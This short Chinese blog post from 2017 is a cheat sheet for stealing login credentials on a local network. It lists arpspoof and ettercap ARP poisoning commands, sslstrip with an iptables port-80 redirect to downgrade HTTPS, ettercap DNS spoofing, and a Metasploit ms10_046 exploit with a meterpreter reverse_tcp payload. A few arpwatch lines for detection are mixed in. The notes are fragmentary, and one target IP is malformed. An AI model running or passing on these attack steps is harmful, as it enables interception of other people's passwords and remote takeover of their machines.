arpspoof+ettercap嗅探局域网HTTP/HTTPS账号密码

1. 开转发 2. arpspoof -i eth0 -t 192.168.110 192.168.1.1 3. ettercap -Tq -i eth0


  1. /etc/ettercap/etter.conf
    /Linux 去掉#

  2. sslstrip -a -s -k
    淘宝加密的太好啦,看不出密码。。。

  3. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

  4. sslstrip -l 10000

  5. ettercap -T -q -i wlan0 -M arp:remote


arpwathch -i eth0
ps -ef | grep arpwatch
cat /var/lib/arpwatch/arp.dat


ettercap -Tq -P dns_spoof -M arp //// ////
use windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp

posted @ 2017-02-16 18:07  itholiday  阅读(2032)  评论(0编辑  收藏  举报